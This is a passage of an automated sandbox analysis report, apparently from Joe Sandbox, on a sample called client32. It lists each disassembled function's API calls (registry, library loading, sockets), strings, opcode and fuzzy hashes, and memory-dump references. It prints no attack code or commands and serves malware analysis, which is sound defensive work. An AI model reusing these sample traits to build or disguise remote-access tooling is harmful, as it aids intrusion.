                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DriveType
                                                                                                                                        • String ID: ?:\
                                                                                                                                        • API String ID: 338552980-2533537817
                                                                                                                                        • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                        • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                                        • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                        • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                                        Function 110EAED0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAE9D
                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAEEC
                                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                        Strings
                                                                                                                                        • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenwvsprintf
                                                                                                                                        • String ID: Error %d Opening regkey %s
                                                                                                                                        • API String ID: 1772833024-3994271378
                                                                                                                                        • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                        • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                                        • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                        • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                                        Function 1110C4A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 1110C4D2
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorExitLastMessageProcess_memsetwsprintf
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                        • API String ID: 4120431230-2363596943
                                                                                                                                        • Opcode ID: 6765fa335fcdcad4f0c283e578fe81b341abc99ab6d3b7cddb529ba8f05bb30a
                                                                                                                                        • Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
                                                                                                                                        • Opcode Fuzzy Hash: 6765fa335fcdcad4f0c283e578fe81b341abc99ab6d3b7cddb529ba8f05bb30a
                                                                                                                                        • Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6
                                                                                                                                        Function 110EAE90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,A0A8B03E), ref: 110EAE9D
                                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                        Strings
                                                                                                                                        • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Closewvsprintf
                                                                                                                                        • String ID: Error %d closing regkey %x
                                                                                                                                        • API String ID: 843752472-892920262
                                                                                                                                        • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                        • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                                        • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                                        • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                                        Function 111429E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0237B878,?,?,?,00000100), ref: 111429F9
                                                                                                                                          • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                        • String ID: NSMTRACE
                                                                                                                                        • API String ID: 4133054770-4175627554
                                                                                                                                        • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                        • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                                        • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                                        • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                                        Function 688F4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,688F8DC8), ref: 688F4F78
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: psapi.dll
                                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                                        • Opcode ID: 5e4fe5394ecc9a3ca551a34b62cbdf2ef91601da64694e7bcfb3562eb5c3209c
                                                                                                                                        • Instruction ID: f85251aeba0524b84f520908e2272b0cd57630e1c57185c779d958a1e27a7866
                                                                                                                                        • Opcode Fuzzy Hash: 5e4fe5394ecc9a3ca551a34b62cbdf2ef91601da64694e7bcfb3562eb5c3209c
                                                                                                                                        • Instruction Fuzzy Hash: 2DE001B1901B208F83B0CF3AA90464ABEF0BB086513118A2E909EC3A10E330E584CF80
                                                                                                                                        Function 110259A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: psapi.dll
                                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                                        • Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                        • Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
                                                                                                                                        • Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
                                                                                                                                        • Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90
                                                                                                                                        Function 11015160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101516E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: nslsp.dll
                                                                                                                                        • API String ID: 1029625771-3933918195
                                                                                                                                        • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                        • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                                                        • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                                                        • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                                                        Function 11073E70 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 11073ECF
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1654520187-0
                                                                                                                                        • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                        • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                                        • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                        • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
                                                                                                                                        Function 688F5C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ioctlsocket.WSOCK32(976C34B3,4004667F,00000000,-000397EB), ref: 688F5D1F
                                                                                                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,976C34B3,4004667F,00000000,-000397EB), ref: 688F5D62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ioctlsocketselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1457273030-0
                                                                                                                                        • Opcode ID: d4d749c1e75f38e4794a12d07e2efc627a0d6f926b1cc85895d2af42e62c8a47
                                                                                                                                        • Instruction ID: b78dbbe7ad560e9cef0ed31646a223d2a26464bbcc85265c76d43c9754d1ec86
                                                                                                                                        • Opcode Fuzzy Hash: d4d749c1e75f38e4794a12d07e2efc627a0d6f926b1cc85895d2af42e62c8a47
                                                                                                                                        • Instruction Fuzzy Hash: 68213E70A053189BEB28DF14C9547EDB7B9EF48304F4081EAA80A9B281DB709F94DF90
                                                                                                                                        Function 11061583 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
